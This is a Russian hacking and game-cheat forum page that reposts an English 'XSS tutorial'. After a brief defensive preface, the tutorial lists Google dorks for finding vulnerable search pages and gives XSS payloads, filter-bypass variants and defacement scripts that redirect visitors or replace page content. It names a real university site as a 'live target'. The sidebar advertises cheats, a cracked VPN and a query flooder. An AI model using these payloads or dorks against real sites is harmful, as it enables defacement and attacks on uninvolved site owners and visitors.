Главная Форум Файлы Статьи СОСТАВ ZH&ZHS О НАС GITHUB КАНАЛ YouTube BlackList WhiteList
Добро пожаловать на уникальный игровой портал ZETA-HACK TEAM! Здесь Вы сможете найти самые интересные новости из мира игровой индустрии, найти самые свежие сотфины для различных онлайн игр, общаясь на форуме получать мнения специалистов и помогать тем кто не смог получить нужный ответ в той или иной сфере!
Авторизация Регистрация
Последние обсуждаемые темы на форуме
Последние комментарии к новостям
Топ-10 форумчан
LCrasher All SAMP ver =AlexDrift= 0
Anti-Freeze CR-MP-0.3e =AlexDrift= 0
RaknetIPWhiteList 0.3.7 =AlexDrift= 2
крякнутый впн Vitalek 1
Накрутка для вк Vitalek 2
[Plugin]Unique Tuning =AlexDrift= 1
клео на 037 Vitalek 0
клео 4 Vitalek 0
халявный чит на кс го 2020 Vitalek 0
QUERY flooder AdCKuY_DpO4uLa 2
ExtremeX DM 27.05.2020
ExtremeX DM 22.05.2020
ExtremeX DM 09.05.2020
ExtremeX DM 09.05.2020
ExtremeX DM 09.05.2020
ExtremeX DM 09.05.2020
ExtremeX DM 09.05.2020
ExtremeX DM 09.05.2020
ExtremeX DM 09.05.2020
ExtremeX DM 09.05.2020
1. =AlexDrift= 597
2. Pahanch1kkk 46
3. AdCKuY_DpO4uLa 37
4. InFerNo 35
5. R4DUGA 32
6. d1amondl1on 31
7. [NACIONAL]IST_BERZ 23
8. Julia 21
9. Lil_Jonson 17
10. Effect 15
Витрина ссылок Купить ссылку (4 р.) » | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка

  • Страница 1 из 1
  • 1
Форум » Архив » Корзина » XSS TuTtorial Not Full Version
XSS TuTtorial Not Full Version
04.12.2017 в 05:11
#1
=AlexDrift=
Не важны козыри если игра не на счет...
Статус: Offline
Регистрация: 24.11.2012
Сообщения: 597
Репутация: 85
Что бы добавить медаль "Легенда портала" добавляем в ?if "or 1='ID пользователя'"
Что бы добавить медаль "Золотой страж" добавляем в ?if "or 1='ID пользователя'"
Код
XSS Tuttorial!!

-----------------Lexus Sy-------------------

Cross Site scripting is one of the problem that has plagued a lot of websites. According to WhiteHat Security Top Ten more than 50% of the websites are vulnerable to cross site scripting. As a web developer, it is important to understand what is cross site scripting and how can we safeguard our site from such attacks.

Cross site scripting is nothing but injection of client side scripts into a website. These scripts can be HTML scripts or JavaScript scripts. Now the question would be how can a person inject scripts on a running page. This can u be done using all the various ways a website is collecting inputs. Cross site scripting can be performed by passing scripts in form of:

TextBox (input controls) 
Query Strings
Cookies
Session variables
Application variables
Retrieved data from an external or shared source
Now let us see some very rudimentary example of cross site scripting and then we will try to see what ASP.NET provides to prevent cross site scripting. We will also look at the best practices that needs to be followed in order to make our website safe from cross site scripting attacks.

-------------------++++++-------------------
Google Dorks :

 inurl:search.php?
 inurl:find.php?
 inurl:search.html
 inurl:find.html
 inurl:search.aspx
 inurl:find.aspx
 inurl:com_feedpostold/feedpost.php?url=
 inurl:/products/orkutclone/  scrapbook.php?id=
 inurl:/products/classified/headersearch.php?sid=
 inurl:/poll/default.asp?catid=
 inurl:/search_results.php?search=Search&k=

-------------------++++++-------------------
Basic Codes That Can Use
<script>alert("XSS")</script>
or your Deface Page Script can do its better i think..
<font color="Red">Your Message<font size="7">

LoL not working lets try Bypassing Querys 

If there's no pop up box 
try using this Codes with bypass
So Its blocked!! Lets move to other XSS attack!!

Some bYpassing Query's 
There are something more just search it..

"><script>alert("XSS")</script>

"><script>alert(String.fromCharCode(88,83,83))</script>

'><script>alert("XSS")</script>

"/><script>alert(String.fromCharCode(88,83,83))</script>

Defacing Code XSS

Defacing:

There are few ways which can be used  to deface a site when you find a XSS vulnerability.

1) Makes A Picture Pop-Up:

<script>location="www.website.com/yourdefacepic";</script>

2) Replace The Content Of The Page By An Image: (TROLLED Face Gif)
<img src=https://media1.giphy.com/media/LUjhTIs7DFpdK/giphy.gif
 height="350px" width="500px">
Ill get an image first...ill use my Defacepage Photo its working Nice with that trolled face

3)Redirect To A Website

<script>window.location=" http://[Yourdefacewebsite.com/Ure.html"</script>

its not working... Too bad Anyway its done. 

LIVE TARGET :

http://voices.iit.edu

XSS Vulnerable Scanner Online :

http://xss-scanner.com/

Try other browser like Google Chrome or Mozilla firefox i think it PoP UP a Box with a message

Thanks....

This video is Requested by 
Indo Bros Thanks Have Fun!!

Bye<3

В ЛС не отвечу, даже не старайтесь. Все вопросы на форум, создавайте тему там ответим.
Форум » Архив » Корзина » XSS TuTtorial Not Full Version
  • Страница 1 из 1
  • 1
Поиск:

условия предоставления
Авторские права и контакты
счетчики
счетчики
счетчики
Файлы, статьи, публикации на форуме предоставлены исключительно в ознакомительных целях. Все материалы принадлежат исключительно их владельцам! Администрация портала не несет ответственности за последствия использования вами сторонних материалов, опубликованных на форуме, каталоге файлов, каталоге статей, но гарантирует отсутствие вредоносного кода в новостях и публикациях на главной. Напоминаем:Весь материал публикуется только для ознакомительных целей! Администрация не несёт ответственности за размещённые материалы. Все материалы предоставлены в ознакомительных целях и администрация предлагает удалить их после ознакомления.
  • Основатель портала - AlexDrift
  • Автор дизайна, разработчик - Lil Jonson
  • По возникшим вопросам дизайна - liljonson682@gmail.com
  • По всем возникшим вопросам - vk.com/alexdrift1137
  • Уникальный игровой портал ZETA-HACK.RU ® 2011 - 2019
  • Сайт создан в системе uCoz

  • Яндекс.Метрика
    Рейтинг@Mail.ru